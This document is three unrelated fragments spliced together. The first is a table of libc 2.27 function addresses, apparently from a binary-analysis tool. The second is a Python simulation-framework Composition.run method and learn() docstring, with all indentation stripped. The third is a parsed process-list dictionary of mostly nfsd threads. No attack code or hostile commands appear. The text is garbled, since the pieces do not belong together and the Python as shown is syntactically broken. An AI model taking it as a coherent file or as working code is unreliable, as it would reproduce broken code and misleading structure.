(0x20cc970, 0, '__isoc99_fwscanf', 'libc_2_27'),
(0x20ccb40, 0, '__isoc99_vfwscanf', 'libc_2_27'),
(0x20ccc70, 0, '__isoc99_swscanf', 'libc_2_27'),
(0x20ccd30, 0, '__isoc99_vswscanf', 'libc_2_27'),
(0x20ccde0, 0, 'mbrtoc16', 'libc_2_27'),
(0x20cd090, 0, 'c16rtomb', 'libc_2_27'),
(0x20cff40, 0, 'wcstof128_l', 'libc_2_27'),
(0x20cff50, 0, '__wcstof128_internal', 'libc_2_27'),
(0x20cff60, 0, 'wcstof128', 'libc_2_27'),
(0x20d1270, 0, 'asctime_r', 'libc_2_27'),
(0x20d1350, 0, 'asctime', 'libc_2_27'),
(0x20d1440, 0, 'clock', 'libc_2_27'),
(0x20d14c0, 0, 'ctime', 'libc_2_27'),
(0x20d14e0, 0, 'ctime_r', 'libc_2_27'),
(0x20d1530, 0, 'difftime', 'libc_2_27'),
(0x20d1550, 0, '__gmtime_r', 'libc_2_27'),
(0x20d1550, 0, 'gmtime_r', 'libc_2_27'),
(0x20d1560, 0, 'gmtime', 'libc_2_27'),
(0x20d1570, 0, 'localtime_r', 'libc_2_27'),
(0x20d1580, 0, 'localtime', 'libc_2_27'),
(0x20d1fa0, 0, 'mktime', 'libc_2_27'),
(0x20d1fa0, 0, 'timelocal', 'libc_2_27'),
(0x20d2980, 0, 'time', 'libc_2_27'),
(0x20d2a60, 0, '__gettimeofday', 'libc_2_27'),
(0x20d2a60, 0, 'gettimeofday', 'libc_2_27'),
(0x20d2b10, 0, 'settimeofday', 'libc_2_27'),
(0x20d2b40, 0, 'adjtime', 'libc_2_27'),
(0x20d4080, 0, 'tzset', 'libc_2_27'),
(0x20d5e20, 0, 'getitimer', 'libc_2_27'),
(0x20d5e50, 0, 'setitimer', 'libc_2_27'),
(0x20d5e80, 0, 'stime', 'libc_2_27'),
(0x20d5ef0, 0, 'dysize', 'libc_2_27'),
(0x20d5f40, 0, 'timegm', 'libc_2_27'),
(0x20d5f60, 0, 'ftime', 'libc_2_27'),
(0x20d6010, 0, 'getdate_r', 'libc_2_27'),
(0x20d6730, 0, 'getdate', 'libc_2_27'),
(0x20d6770, 0, 'strptime', 'libc_2_27'),
(0x20d9dd0, 0, 'strptime_l', 'libc_2_27'),
(0x20d9de0, 0, 'strftime', 'libc_2_27'),
(0x20d9df0, 0, 'wcsftime', 'libc_2_27'),
(0x20dc240, 0, '__strftime_l', 'libc_2_27'),
(0x20dc240, 0, 'strftime_l', 'libc_2_27'),
(0x20ded50, 0, '__wcsftime_l', 'libc_2_27'),
(0x20ded50, 0, 'wcsftime_l', 'libc_2_27'),
(0x20ded90, 0, 'timespec_get', 'libc_2_27'),
(0x20df690, 0, 'ntp_gettime', 'libc_2_27'),
(0x20df700, 0, 'ntp_gettimex', 'libc_2_27'),
(0x20df920, 0, 'opendir', 'libc_2_27'),
(0x20dfbb0, 0, 'closedir', 'libc_2_27'),
(0x20dfbe0, 0, 'readdir', 'libc_2_27'),
(0x20dfbe0, 0, 'readdir64', 'libc_2_27'),
(0x20dfce0, 0, 'readdir64_r', 'libc_2_27'),
(0x20dfce0, 0, 'readdir_r', 'libc_2_27'),
(0x20dfef0, 0, 'rewinddir', 'libc_2_27'),
(0x20dff80, 0, 'seekdir', 'libc_2_27'),
(0x20e0010, 0, 'telldir', 'libc_2_27'),
(0x20e0020, 0, 'scandir', 'libc_2_27'),
(0x20e0020, 0, 'scandir64', 'libc_2_27'),
(0x20e0050, 0, 'alphasort', 'libc_2_27'),
(0x20e0050, 0, 'alphasort64', 'libc_2_27'),
(0x20e0070, 0, 'versionsort', 'libc_2_27'),
(0x20e0070, 0, 'versionsort64', 'libc_2_27'),
(0x20e0120, 0, 'dirfd', 'libc_2_27'),
(0x20e0130, 0, 'fdopendir', 'libc_2_27'),
(0x20e01f0, 0, 'scandirat', 'libc_2_27'),
(0x20e01f0, 0, 'scandirat64', 'libc_2_27'),
(0x20e0460, 0, 'getdirentries', 'libc_2_27'),
(0x20e0460, 0, 'getdirentries64', 'libc_2_27'),
(0x20e04b0, 0, 'fgetgrent', 'libc_2_27'),
(0x20e0c70, 0, 'getgrouplist', 'libc_2_27'),
(0x20e0d40, 0, 'initgroups', 'libc_2_27'),
(0x20e0e40, 0, 'setgroups', 'libc_2_27'),
(0x20e0ed0, 0, 'getgrent', 'libc_2_27'),
(0x20e0f90, 0, 'getgrgid', 'libc_2_27'),
(0x20e1130, 0, 'getgrnam', 'libc_2_27'),
(0x20e12d0, 0, 'putgrent', 'libc_2_27'),
(0x20e15a0, 0, 'setgrent', 'libc_2_27'),
(0x20e1660, 0, 'endgrent', 'libc_2_27'),
(0x20e1730, 0, 'getgrent_r', 'libc_2_27'),
(0x20e1810, 0, 'getgrgid_r', 'libc_2_27'),
(0x20e1cd0, 0, 'getgrnam_r', 'libc_2_27'),
(0x20e21b0, 0, '_nss_files_parse_grent', 'libc_2_27'),
(0x20e24c0, 0, 'fgetgrent_r', 'libc_2_27'),
(0x20e2750, 0, '__copy_grp', 'libc_2_27'),
(0x20e2970, 0, '__merge_grp', 'libc_2_27'),
(0x20e2d30, 0, 'fgetpwent', 'libc_2_27'),
(0x20e2f30, 0, 'getpw', 'libc_2_27'),
(0x20e3010, 0, 'putpwent', 'libc_2_27'),
(0x20e31a0, 0, 'getpwent', 'libc_2_27'),
(0x20e3260, 0, 'getpwnam', 'libc_2_27'),
(0x20e3400, 0, 'getpwuid', 'libc_2_27'),
(0x20e35a0, 0, 'setpwent', 'libc_2_27'),
(0x20e3660, 0, 'endpwent', 'libc_2_27'),
(0x20e3730, 0, 'getpwent_r', 'libc_2_27'),
(0x20e3810, 0, 'getpwnam_r', 'libc_2_27'),
(0x20e3bf0, 0, 'getpwuid_r', 'libc_2_27'),
(0x20e3fc0, 0, '_nss_files_parse_pwent', 'libc_2_27'),
(0x20e42d0, 0, 'fgetpwent_r', 'libc_2_27'),
(0x20e4540, 0, 'uname', 'libc_2_27'),
(0x20e4570, 0, 'times', 'libc_2_27'),
(0x20e45d0, 0, '__wait', 'libc_2_27'),
(0x20e45d0, 0, 'wait', 'libc_2_27'),
(0x20e4670, 0, '__waitpid', 'libc_2_27'),
(0x20e4670, 0, 'waitpid', 'libc_2_27'),
(0x20e4740, 0, 'wait3', 'libc_2_27'),
(0x20e4760, 0, 'wait4', 'libc_2_27'),
(0x20e4790, 0, 'waitid', 'libc_2_27'),
(0x20e4840, 0, 'alarm', 'libc_2_27'),
(0x20e4870, 0, 'sleep', 'libc_2_27'),
(0x20e48e0, 0, 'pause', 'libc_2_27'),
(0x20e4990, 0, '__nanosleep', 'libc_2_27'),
(0x20e4990, 0, 'nanosleep', 'libc_2_27'),
(0x20e4a50, 0, '__fork', 'libc_2_27'),
(0x20e4a50, 0, '__libc_fork', 'libc_2_27'),
(0x20e4a50, 0, 'fork', 'libc_2_27'),
(0x20e4da0, 0, '__libc_vfork', 'libc_2_27'),
(0x20e4da0, 0, '__vfork', 'libc_2_27'),
(0x20e4da0, 0, 'vfork', 'libc_2_27'),
(0x20e4dd0, 0, '_Exit', 'libc_2_27'),
(0x20e4dd0, 0, '_exit', 'libc_2_27'),
(0x20e4e30, 0, 'execve', 'libc_2_27'),
(0x20e4e60, 0, 'fexecve', 'libc_2_27'),
(0x20e4fa0, 0, 'execv', 'libc_2_27'),
(0x20e4fb0, 0, 'execle', 'libc_2_27'),
(0x20e5160, 0, 'execl', 'libc_2_27'),
(0x20e52f0, 0, 'execvp', 'libc_2_27'),
(0x20e5300, 0, 'execlp', 'libc_2_27'),
(0x20e5490, 0, 'execvpe', 'libc_2_27'),
(0x20e58e0, 0, '__getpid', 'libc_2_27'),
(0x20e58e0, 0, 'getpid', 'libc_2_27'),
(0x20e58f0, 0, 'getppid', 'libc_2_27'),
(0x20e5900, 0, 'getuid', 'libc_2_27'),
(0x20e5910, 0, 'geteuid', 'libc_2_27'),
(0x20e5920, 0, 'getgid', 'libc_2_27'),
(0x20e5930, 0, 'getegid', 'libc_2_27'),
(0x20e5940, 0, 'getgroups', 'libc_2_27'),
(0x20e5970, 0, 'setuid', 'libc_2_27'),
(0x20e5a00, 0, 'setgid', 'libc_2_27'),
(0x20e5a90, 0, 'group_member', 'libc_2_27'),
(0x20e5b40, 0, '__getpgid', 'libc_2_27'),
(0x20e5b40, 0, 'getpgid', 'libc_2_27'),
(0x20e5b70, 0, '__setpgid', 'libc_2_27'),
(0x20e5b70, 0, 'setpgid', 'libc_2_27'),
(0x20e5ba0, 0, 'getpgrp', 'libc_2_27'),
(0x20e5bb0, 0, '__bsd_getpgrp', 'libc_2_27'),
(0x20e5bc0, 0, 'setpgrp', 'libc_2_27'),
(0x20e5bd0, 0, 'getsid', 'libc_2_27'),
(0x20e5c00, 0, 'setsid', 'libc_2_27'),
(0x20e5c30, 0, 'getresuid', 'libc_2_27'),
(0x20e5c60, 0, 'getresgid', 'libc_2_27'),
(0x20e5c90, 0, 'setresuid', 'libc_2_27'),
(0x20e5d30, 0, 'setresgid', 'libc_2_27'),
(0x20e6090, 0, 'pathconf', 'libc_2_27'),
(0x20e69f0, 0, '__sysconf', 'libc_2_27'),
(0x20e69f0, 0, 'sysconf', 'libc_2_27'),
(0x20e6dd0, 0, 'fpathconf', 'libc_2_27'),
(0x20e7b00, 0, 'glob', 'libc_2_27'),
(0x20e7b00, 0, 'glob64', 'libc_2_27'),
(0x20e9620, 0, 'globfree', 'libc_2_27'),
(0x20e9620, 0, 'globfree64', 'libc_2_27'),
(0x20e9680, 0, 'glob_pattern_p', 'libc_2_27'),
(0x20ed7a0, 0, 'fnmatch', 'libc_2_27'),
(0x2101120, 0, 're_compile_pattern', 'libc_2_27'),
(0x21011a0, 0, 're_set_syntax', 'libc_2_27'),
(0x21011b0, 0, 're_compile_fastmap', 'libc_2_27'),
(0x2101280, 0, 'regcomp', 'libc_2_27'),
(0x2101440, 0, 'regerror', 'libc_2_27'),
(0x21014d0, 0, 'regfree', 'libc_2_27'),
(0x2101520, 0, 're_comp', 'libc_2_27'),
(0x2101670, 0, 'regexec', 'libc_2_27'),
(0x21017b0, 0, 're_match', 'libc_2_27'),
(0x21017d0, 0, 're_search', 'libc_2_27'),
(0x21017f0, 0, 're_match_2', 'libc_2_27'),
(0x21018f0, 0, 're_search_2', 'libc_2_27'),
(0x21019f0, 0, 're_set_registers', 'libc_2_27'),
(0x2101a30, 0, 're_exec', 'libc_2_27'),
(0x21025a0, 0, 'confstr', 'libc_2_27'),
(0x2103cd0, 0, 'getopt', 'libc_2_27'),
(0x2103cf0, 0, '__posix_getopt', 'libc_2_27'),
(0x2103d10, 0, 'getopt_long', 'libc_2_27'),
(0x2103d50, 0, 'getopt_long_only', 'libc_2_27'),
(0x2103d90, 0, 'sched_setparam', 'libc_2_27'),
(0x2103dc0, 0, '__sched_getparam', 'libc_2_27'),
(0x2103dc0, 0, 'sched_getparam', 'libc_2_27'),
(0x2103df0, 0, '__sched_setscheduler', 'libc_2_27'),
(0x2103df0, 0, 'sched_setscheduler', 'libc_2_27'),
(0x2103e20, 0, '__sched_getscheduler', 'libc_2_27'),
(0x2103e20, 0, 'sched_getscheduler', 'libc_2_27'),
(0x2103e50, 0, '__sched_yield', 'libc_2_27'),
(0x2103e50, 0, 'sched_yield', 'libc_2_27'),
(0x2103e80, 0, '__sched_get_priority_max', 'libc_2_27'),
(0x2103e80, 0, 'sched_get_priority_max', 'libc_2_27'),
(0x2103eb0, 0, '__sched_get_priority_min', 'libc_2_27'),
(0x2103eb0, 0, 'sched_get_priority_min', 'libc_2_27'),
(0x2103ee0, 0, 'sched_rr_get_interval', 'libc_2_27'),
(0x2103f10, 0, 'sched_getaffinity', 'libc_2_27'),
(0x2103f80, 0, 'sched_setaffinity', 'libc_2_27'),
(0x2107bc0, 0, 'getaddrinfo', 'libc_2_27'),
(0x2108880, 0, 'freeaddrinfo', 'libc_2_27'),
(0x21088c0, 0, 'gai_strerror', 'libc_2_27'),
(0x210d2d0, 0, 'wordfree', 'libc_2_27'),
(0x210d340, 0, 'wordexp', 'libc_2_27'),
(0x210e620, 0, '__libc_pread', 'libc_2_27'),
(0x210e620, 0, '__pread64', 'libc_2_27'),
(0x210e620, 0, 'pread', 'libc_2_27'),
(0x210e620, 0, 'pread64', 'libc_2_27'),
(0x210e6d0, 0, '__libc_pwrite', 'libc_2_27'),
(0x210e6d0, 0, '__pwrite64', 'libc_2_27'),
(0x210e6d0, 0, 'pwrite', 'libc_2_27'),
(0x210e6d0, 0, 'pwrite64', 'libc_2_27'),
(0x210e7d0, 0, 'posix_spawn_file_actions_init', 'libc_2_27'),
(0x210e7f0, 0, 'posix_spawn_file_actions_destroy', 'libc_2_27'),
(0x210e860, 0, 'posix_spawn_file_actions_addclose', 'libc_2_27'),
(0x210e8d0, 0, 'posix_spawn_file_actions_addopen', 'libc_2_27'),
(0x210e980, 0, 'posix_spawn_file_actions_adddup2', 'libc_2_27'),
(0x210ea30, 0, 'posix_spawnattr_init', 'libc_2_27'),
(0x210ea60, 0, 'posix_spawnattr_destroy', 'libc_2_27'),
(0x210ea70, 0, 'posix_spawnattr_getsigdefault', 'libc_2_27'),
(0x210eac0, 0, 'posix_spawnattr_setsigdefault', 'libc_2_27'),
(0x210eb10, 0, 'posix_spawnattr_getflags', 'libc_2_27'),
(0x210eb20, 0, 'posix_spawnattr_setflags', 'libc_2_27'),
(0x210eb40, 0, 'posix_spawnattr_getpgroup', 'libc_2_27'),
(0x210eb50, 0, 'posix_spawnattr_setpgroup', 'libc_2_27'),
(0x210eb60, 0, 'posix_spawn', 'libc_2_27'),
(0x210eb70, 0, 'posix_spawnp', 'libc_2_27'),
(0x210f350, 0, 'posix_spawnattr_getsigmask', 'libc_2_27'),
(0x210f3c0, 0, 'posix_spawnattr_getschedpolicy', 'libc_2_27'),
(0x210f3d0, 0, 'posix_spawnattr_getschedparam', 'libc_2_27'),
(0x210f3e0, 0, 'posix_spawnattr_setsigmask', 'libc_2_27'),
(0x210f450, 0, 'posix_spawnattr_setschedpolicy', 'libc_2_27'),
(0x210f470, 0, 'posix_spawnattr_setschedparam', 'libc_2_27'),
(0x210f480, 0, 'posix_madvise', 'libc_2_27'),
(0x210f590, 0, '__sched_cpucount', 'libc_2_27'),
(0x210f5b0, 0, '__sched_cpualloc', 'libc_2_27'),
(0x210f5d0, 0, '__sched_cpufree', 'libc_2_27'),
(0x210f5e0, 0, 'sched_getcpu', 'libc_2_27'),
(0x210f690, 0, 'utime', 'libc_2_27'),
(0x210f6c0, 0, 'mkfifo', 'libc_2_27'),
(0x210f710, 0, 'mkfifoat', 'libc_2_27'),
(0x210f760, 0, '__xstat', 'libc_2_27'),
(0x210f760, 0, '__xstat64', 'libc_2_27'),
(0x210f7b0, 0, '__fxstat', 'libc_2_27'),
(0x210f7b0, 0, '__fxstat64', 'libc_2_27'),
(0x210f800, 0, '__lxstat', 'libc_2_27'),
(0x210f800, 0, '__lxstat64', 'libc_2_27'),
(0x210f850, 0, '__xmknod', 'libc_2_27'),
(0x210f8b0, 0, '__xmknodat', 'libc_2_27'),
(0x210f910, 0, '__fxstatat', 'libc_2_27'),
(0x210f910, 0, '__fxstatat64', 'libc_2_27'),
(0x210f970, 0, '__statfs', 'libc_2_27'),
(0x210f970, 0, 'statfs', 'libc_2_27'),
(0x210f970, 0, 'statfs64', 'libc_2_27'),
(0x210f9a0, 0, 'fstatfs', 'libc_2_27'),
(0x210f9a0, 0, 'fstatfs64', 'libc_2_27'),
(0x210f9d0, 0, 'statvfs', 'libc_2_27'),
(0x210f9d0, 0, 'statvfs64', 'libc_2_27'),
(0x210fa40, 0, 'fstatvfs', 'libc_2_27'),
(0x210fa40, 0, 'fstatvfs64', 'libc_2_27'),
(0x210fab0, 0, 'umask', 'libc_2_27'),
(0x210fac0, 0, 'chmod', 'libc_2_27'),
(0x210faf0, 0, 'fchmod', 'libc_2_27'),
(0x210fb20, 0, 'lchmod', 'libc_2_27'),
(0x210fb40, 0, 'fchmodat', 'libc_2_27'),
(0x210fbb0, 0, 'mkdir', 'libc_2_27'),
(0x210fbe0, 0, 'mkdirat', 'libc_2_27'),
(0x210fc10, 0, '__open_2', 'libc_2_27'),
(0x210fc40, 0, '__open', 'libc_2_27'),
(0x210fc40, 0, '__open64', 'libc_2_27'),
(0x210fc40, 0, 'open', 'libc_2_27'),
(0x210fc40, 0, 'open64', 'libc_2_27'),
(0x210fd70, 0, '__open_nocancel', 'libc_2_27'),
(0x210fe10, 0, '__open64_2', 'libc_2_27'),
(0x210fe40, 0, '__openat_2', 'libc_2_27'),
(0x210fe70, 0, 'openat', 'libc_2_27'),
(0x210fe70, 0, 'openat64', 'libc_2_27'),
(0x2110040, 0, '__openat64_2', 'libc_2_27'),
(0x2110070, 0, '__read', 'libc_2_27'),
(0x2110070, 0, 'read', 'libc_2_27'),
(0x2110110, 0, '__read_nocancel', 'libc_2_27'),
(0x2110140, 0, '__write', 'libc_2_27'),
(0x2110140, 0, 'write', 'libc_2_27'),
(0x2110210, 0, '__lseek', 'libc_2_27'),
(0x2110210, 0, 'llseek', 'libc_2_27'),
(0x2110210, 0, 'lseek', 'libc_2_27'),
(0x2110210, 0, 'lseek64', 'libc_2_27'),
(0x2110240, 0, 'access', 'libc_2_27'),
(0x2110270, 0, 'eaccess', 'libc_2_27'),
(0x2110270, 0, 'euidaccess', 'libc_2_27'),
(0x21103c0, 0, 'faccessat', 'libc_2_27'),
(0x21105a0, 0, '__fcntl', 'libc_2_27'),
(0x21105a0, 0, 'fcntl', 'libc_2_27'),
(0x2110770, 0, 'flock', 'libc_2_27'),
(0x21107a0, 0, 'lockf', 'libc_2_27'),
(0x21107a0, 0, 'lockf64', 'libc_2_27'),
(0x21108c0, 0, '__close', 'libc_2_27'),
(0x21108c0, 0, 'close', 'libc_2_27'),
(0x2110940, 0, '__close_nocancel', 'libc_2_27'),
(0x2110970, 0, 'dup', 'libc_2_27'),
(0x21109a0, 0, '__dup2', 'libc_2_27'),
(0x21109a0, 0, 'dup2', 'libc_2_27'),
(0x21109d0, 0, 'dup3', 'libc_2_27'),
(0x2110a00, 0, '__pipe', 'libc_2_27'),
(0x2110a00, 0, 'pipe', 'libc_2_27'),
(0x2110a30, 0, 'pipe2', 'libc_2_27'),
(0x2110a60, 0, 'creat', 'libc_2_27'),
(0x2110a60, 0, 'creat64', 'libc_2_27'),
(0x2110af0, 0, 'chdir', 'libc_2_27'),
(0x2110b20, 0, 'fchdir', 'libc_2_27'),
(0x2110b50, 0, 'getcwd', 'libc_2_27'),
(0x2111270, 0, 'getwd', 'libc_2_27'),
(0x2111320, 0, 'get_current_dir_name', 'libc_2_27'),
(0x21113e0, 0, 'chown', 'libc_2_27'),
(0x2111410, 0, 'fchown', 'libc_2_27'),
| |
= ContextFlags.COMPOSITION
# FIX 5/28/20
# context.execution_phase = ContextFlags.PREPARING
# context.replace_flag(ContextFlags.IDLE, ContextFlags.PREPARING)
if scheduler is None:
scheduler = self.scheduler
if termination_processing is None:
termination_processing = self.termination_processing
else:
new_conds = self.termination_processing.copy()
new_conds.update(termination_processing)
termination_processing = new_conds
for node in self.nodes:
num_execs = node.parameters.num_executions._get(context)
if num_execs is None:
node.parameters.num_executions._set(Time(), context)
else:
node.parameters.num_executions._get(context)._set_by_time_scale(TimeScale.RUN, 0)
if ContextFlags.SIMULATION_MODE not in context.runmode:
try:
self.parameters.input_specification._set(copy(inputs), context)
except:
self.parameters.input_specification._set(inputs, context)
# DS 1/7/20: Check to see if any Components are still in deferred init. If so, attempt to initialize them.
# If they can not be initialized, raise a warning.
self._complete_init_of_partially_initialized_nodes(context=context)
if ContextFlags.SIMULATION_MODE not in context.runmode:
self._check_projection_initialization_status()
if not skip_analyze_graph:
self._analyze_graph(context=context)
self._check_for_unnecessary_feedback_projections()
# set auto logging if it's not already set, and if log argument is True
if log:
self.enable_logging()
# Set animation attributes
if animate is True:
animate = {}
self._animate = animate
if self._animate is not False:
self._set_up_animation(context)
# SET UP EXECUTION -----------------------------------------------
results = self.parameters.results._get(context)
if results is None:
results = []
self._assign_execution_ids(context)
scheduler._init_counts(execution_id=context.execution_id)
input_nodes = self.get_nodes_by_role(NodeRole.INPUT)
inputs, num_inputs_sets = self._parse_run_inputs(inputs)
if num_trials is not None:
num_trials = num_trials
else:
num_trials = num_inputs_sets
scheduler._reset_counts_total(TimeScale.RUN, context.execution_id)
# KDM 3/29/19: run the following not only during LLVM Run compilation, due to bug where TimeScale.RUN
# termination condition is checked and no data yet exists. Adds slight overhead as long as run is not
# called repeatedly (this init is repeated in Composition.execute)
# initialize from base context but don't overwrite any values already set for this context
if (not skip_initialization
and (context is None or ContextFlags.SIMULATION_MODE not in context.runmode)):
self._initialize_from_context(context, base_context, override=False)
context.composition = self
if initialize_cycle_values is not None:
self.initialize(values=initialize_cycle_values, include_unspecified_nodes=False, context=context)
if not reset_stateful_functions_to:
reset_stateful_functions_to = {}
for node, vals in reset_stateful_functions_to.items():
try:
iter(vals)
except TypeError:
vals = [vals]
reset_stateful_functions_to[node] = vals
if (isinstance(reset_stateful_functions_when, Never) or
node not in reset_stateful_functions_when) and \
isinstance(node.reset_stateful_function_when, Never):
try:
node.reset(**vals, context=context)
except TypeError:
node.reset(*vals, context=context)
# cache and set reset_stateful_function_when conditions for nodes, matching old System behavior
# Validate
valid_reset_type = True
if not isinstance(reset_stateful_functions_when, (Condition, dict)):
valid_reset_type = False
elif type(reset_stateful_functions_when) == dict:
if False in {True if isinstance(k, Mechanism) and isinstance(v, Condition) else
False for k,v in reset_stateful_functions_when.items()}:
valid_reset_type = False
if not valid_reset_type:
raise CompositionError(
f"{reset_stateful_functions_when} is not a valid specification for reset_integrator_nodes_when of {self.name}. "
"reset_integrator_nodes_when must be a Condition or a dict comprised of {Node: Condition} pairs.")
self._reset_stateful_functions_when_cache = {}
# use type here to avoid another costly call to isinstance
if not type(reset_stateful_functions_when) == dict:
for node in self.nodes:
try:
if isinstance(node.reset_stateful_function_when, Never):
self._reset_stateful_functions_when_cache[node] = node.reset_stateful_function_when
node.reset_stateful_function_when = reset_stateful_functions_when
except AttributeError:
pass
else:
for node in reset_stateful_functions_when:
self._reset_stateful_functions_when_cache[node] = node.reset_stateful_function_when
node.reset_stateful_function_when = reset_stateful_functions_when[node]
is_simulation = (context is not None and
ContextFlags.SIMULATION_MODE in context.runmode)
if (bin_execute is True or str(bin_execute).endswith('Run')):
# There's no mode to run simulations.
# Simulations are run as part of the controller node wrapper.
assert not is_simulation
try:
comp_ex_tags = frozenset({"learning"}) if self._is_learning(context) else frozenset()
if bin_execute is True or bin_execute.startswith('LLVM'):
_comp_ex = pnlvm.CompExecution(self, [context.execution_id], additional_tags=comp_ex_tags)
results += _comp_ex.run(inputs, num_trials, num_inputs_sets)
elif bin_execute.startswith('PTX'):
self.__ptx_initialize(context, additional_tags=comp_ex_tags)
EX = self._compilation_data.ptx_execution._get(context)
results += EX.cuda_run(inputs, num_trials, num_inputs_sets)
# Update the parameter for results
self.parameters.results._set(results, context)
if self._is_learning(context):
# copies back matrix to pnl from param struct (after learning)
_comp_ex._copy_params_to_pnl(context=context)
# KAM added the [-1] index after changing Composition run()
# behavior to return only last trial of run (11/7/18)
self.most_recent_context = context
return results[-1]
except Exception as e:
if bin_execute is not True:
raise e from None
warnings.warn("Failed to run `{}': {}".format(self.name, str(e)))
# Reset gym forager environment for the current trial
if self.env:
trial_output = np.atleast_2d(self.env.reset())
else:
trial_output = None
# Loop over the length of the list of inputs - each input represents a TRIAL
for trial_num in range(num_trials):
# Execute call before trial "hook" (user defined function)
if call_before_trial:
call_with_pruned_args(call_before_trial, context=context)
if termination_processing[TimeScale.RUN].is_satisfied(
scheduler=scheduler,
context=context
):
break
# PROCESSING ------------------------------------------------------------------------
# Prepare stimuli from the outside world -- collect the inputs for this TRIAL and store them in a dict
try:
execution_stimuli = self._parse_trial_inputs(inputs, trial_num)
except StopIteration:
break
# execute processing
# pass along the stimuli for this trial
trial_output = self.execute(inputs=execution_stimuli,
scheduler=scheduler,
termination_processing=termination_processing,
call_before_time_step=call_before_time_step,
call_before_pass=call_before_pass,
call_after_time_step=call_after_time_step,
call_after_pass=call_after_pass,
reset_stateful_functions_to=reset_stateful_functions_to,
context=context,
base_context=base_context,
clamp_input=clamp_input,
runtime_params=runtime_params,
skip_initialization=True,
bin_execute=bin_execute,
)
# ---------------------------------------------------------------------------------
# store the result of this execution in case it will be the final result
# object.results.append(result)
if isinstance(trial_output, collections.abc.Iterable):
result_copy = trial_output.copy()
else:
result_copy = trial_output
if ContextFlags.SIMULATION_MODE not in context.runmode:
results.append(result_copy)
self.parameters.results._set(results, context)
if not self.parameters.retain_old_simulation_data._get():
if self.controller is not None:
# if any other special parameters store simulation info that needs to be cleaned up
# consider dedicating a function to it here
# this will not be caught above because it resides in the base context (context)
if not self.parameters.simulation_results.retain_old_simulation_data:
self.parameters.simulation_results._get(context).clear()
if not self.controller.parameters.simulation_ids.retain_old_simulation_data:
self.controller.parameters.simulation_ids._get(context).clear()
if call_after_trial:
call_with_pruned_args(call_after_trial, context=context)
# IMPLEMENTATION NOTE:
# The AFTER Run controller execution takes place here, because there's no way to tell from within the execute
# method whether or not we are at the last trial of the run.
        # The BEFORE Run controller execution takes place in the execute method, because we can't execute the controller until after
# setup has occurred for the Input CIM.
if (self.controller_mode == AFTER and
self.controller_time_scale == TimeScale.RUN):
try:
_comp_ex
except NameError:
_comp_ex = None
self._execute_controller(
bin_execute=bin_execute,
_comp_ex=_comp_ex,
context=context
)
# Reset input spec for next trial
self.parameters.input_specification._set(None, context)
scheduler.get_clock(context)._increment_time(TimeScale.RUN)
self.most_recent_context = context
if self._animate is not False:
# Save list of gifs in self._animation as movie file
movie_path = self._animation_directory + '/' + self._movie_filename
self._animation[0].save(fp=movie_path,
format='GIF',
save_all=True,
append_images=self._animation[1:],
duration=self._image_duration * 1000,
loop=0)
# print(f'\nSaved movie for {self.name} in {self._animation_directory}/{self._movie_filename}')
print(f"\nSaved movie for '{self.name}' in '{self._movie_filename}'")
if self._show_animation:
movie = Image.open(movie_path)
movie.show()
# Undo override of reset_stateful_function_when conditions
for node in self.nodes:
try:
node.reset_stateful_function_when = self._reset_stateful_functions_when_cache[node]
except KeyError:
pass
return trial_output
@handle_external_context()
def learn(
self,
inputs: dict,
targets: tc.optional(dict) = None,
num_trials: tc.optional(int) = None,
epochs: int = 1,
minibatch_size: int = 1,
patience: tc.optional(int) = None,
min_delta: int = 0,
context: tc.optional(Context) = None,
bin_execute=False,
randomize_minibatches=False,
call_before_minibatch = None,
call_after_minibatch = None,
*args,
**kwargs
):
"""
Runs the composition in learning mode - that is, any components with disable_learning False will be
executed in learning mode. See `Composition_Learning` for details.
Arguments
---------
inputs: {`Node <Composition_Nodes>`:list }
a dictionary containing a key-value pair for each `Node <Composition_Nodes>` (Mechanism or Composition)
in the composition that receives inputs from the user. There are several equally valid ways that this
dict can be structured:
            1. For each pair, the key is the `Node <Composition_Nodes>` and the value is an input, the shape of which must match the Node's
default variable. This is identical to the input dict in the `run <Composition.run>` method
(see `Input Dictionary <Composition_Input_Dictionary>` for additional details).
2. A dict with keys 'inputs', 'targets', and 'epochs'. The `inputs` key stores a dict that is the same
same structure as input specification (1) of learn. The `targets` and `epochs` keys should contain
values of the same shape as `targets <Composition.learn>` and `epochs <Composition.learn>`.
targets: {`Node <Composition_Nodes>`:list }
a dictionary containing a key-value pair for each `Node <Composition_Nodes>` in the Composition that
receives target values as input to the Composition for training `learning pathways
<Composition_Learning_Pathway>`. The key of each entry can be either the `TARGET_MECHANISM
<Composition_Learning_Components>` for a learning pathway or the final Node in that Pathway, and
the value is the target value used for that Node on each trial (see `target inputs
<Composition_Target_Inputs>` for additional details concerning the formatting of targets).
num_trials : int (default=None)
typically, the composition will infer the number of trials from the length of its input specification.
To reuse the same inputs across many trials, you may specify an input dictionary with lists of length 1,
or use default inputs, and select a number of trials with num_trials.
epochs : int (default=1)
specifies the number of | |
'status': 'S'},
'15126': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15127': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15128': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15129': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15130': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15131': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15132': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15133': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15135': {'five_min': '0%',
'five_sec': '0%',
'name': 'rpc.mountd',
'one_min': '0%',
'ppid': 1,
'size': 1789952,
'status': 'S'},
'152': {'five_min': '0%',
'five_sec': '0%',
'name': 'sync_supers',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15337': {'five_min': '0%',
'five_sec': '0%',
'name': 'lsmpi-refill',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15338': {'five_min': '0%',
'five_sec': '0%',
'name': 'lsmpi-xmit',
